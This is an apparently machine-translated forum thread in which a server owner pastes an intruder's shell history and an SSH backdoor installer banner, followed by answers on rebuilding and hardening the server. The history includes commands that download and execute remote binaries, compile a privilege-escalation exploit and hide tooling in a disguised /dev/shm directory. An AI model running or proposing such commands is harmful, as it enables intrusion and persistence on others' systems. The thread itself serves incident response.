在VServer上找到SSH后门。该怎么办？

昨天，我检查了VServer上的命令历史记录。我发现了几条可疑的线。

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

尤其是sniffer.tgz震惊了我。我设置了虚拟机并下载了此tgz存档。我开始设置，它给了我以下几行：

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

有人知道如何删除吗？

这是您在拥有此系统的所有系统上应该执行的操作sniffer.tgz：立即从Orbit中将它们删除，然后从全新安装开始。（也就是说，销毁系统，重新安装干净的系统，从干净的备份中加载数据-假设您的备份是干净的，然后在将系统放回Internet之前对其进行加固）。

每当您有这样的恶意软件或黑客进入您的系统时，就该重新分析系统的配置，并确保不要重复与之相同的步骤。但是，由于这可能不是一个系统，因此您可以搁置并进行取证分析，并且由于这可能是您唯一的服务器，因此该破坏虚拟系统并从头开始的时候到了（如上所述）。

（这适用于您在系统上感染恶意软件的任何情况。除非您有备用硬件来替换类似的东西，这样您就可以隔离并取证检查被破坏的系统（通常大多数用户没有），您别无选择，核对系统并重新开始。）

如果不分析您的服务器，我无法真正说出您做错了什么，但是很可能这个后门比只安装一个简单的“程序”在系统中更深入。而且，由于恶意分子已经必须在系统上安装后门，因此您可以假定您的所有密码现在都已被破坏并且不再安全（无论是SSH，MySQL root还是任何其他具有EVER的密码类型）已输入此计算机系统）。是时候更改所有密码了！

在干净的环境中备份后，这里有一些有关加强步骤的基本提示。请注意，由于这些使它成为更广泛的主题，因此我在这里无法真正进行详细介绍，但是绝对是时候采取一些强化措施来保护您的系统了：

1. 打开防火墙，仅允许访问需要打开的端口。 ufw存在很简单，所以让我们使用它。 sudo ufw enable。（ufw为您的环境正确配置是另一回事，这超出了此问题的范围。）

2. 限制对远程SSH的访问。这并不总是可行的，但是理想情况下，您将识别出您拥有的IP地址，并在防火墙中将其列入白名单。（如果您使用的是动态住宅IP地址，请跳过此步骤）。

3. 锁定对服务器的SSH访问，并且仅要求使用SSH密钥进行身份验证。这样，黑客就无法攻击您的服务器并尝试猜测密码。猜测正确的私钥要困难得多（因为您必须对所有私钥进行暴力破解），这有助于防止暴力破解攻击。

4. 如果您正在运行一个网站，请确保锁定权限，以使人们无法随意上载/执行操作。这样做因站点而异，所以在这里我不能为您提供更多指导（这是不可能的）。

5. 另外，如果您使用Joomla或Wordpress或类似工具来运行网站，请确保您保持环境最新，并使用软件提供商的安全漏洞进行修补。

6. 在可能的情况下，设置，配置和使用两因素身份验证（2FA）方法来进行身份验证。对于不同的应用程序，有许多用于二次身份验证的解决方案，并且以这种方式保护各种应用程序超出了本文的范围，因此，在选择解决方案之前，您应该对此进行研究。

7. 如果您绝对必须在设置中使用密码，请使用体面的密码管理器（基于云的密码管理器不一定是不错的选择），并使用长度（25个以上的字符），随机且难记的密码，每个密码都不同由密码保护（因此建议使用密码管理器）。（但是，您应该强烈考虑不要在可能的情况下使用密码（例如用于SSH身份验证），并在可能的情况下使用2FA）。

如果有一个后门，则还有3个。隔离，备份数据，核对数据并仔细还原数据。请注意任何cron，php甚至mysql数据，它们都可能受到损害。请记住，此时它们已经拥有了您的所有密码和哈希，因此，如果您对其他机器进行类似配置，它们也可能也会入侵这些密码。如果您有WordPress在插件/主题等中查找恶意软件...请检查您的权限，到处可能有777。没有简单的答案，您正在做很多工作。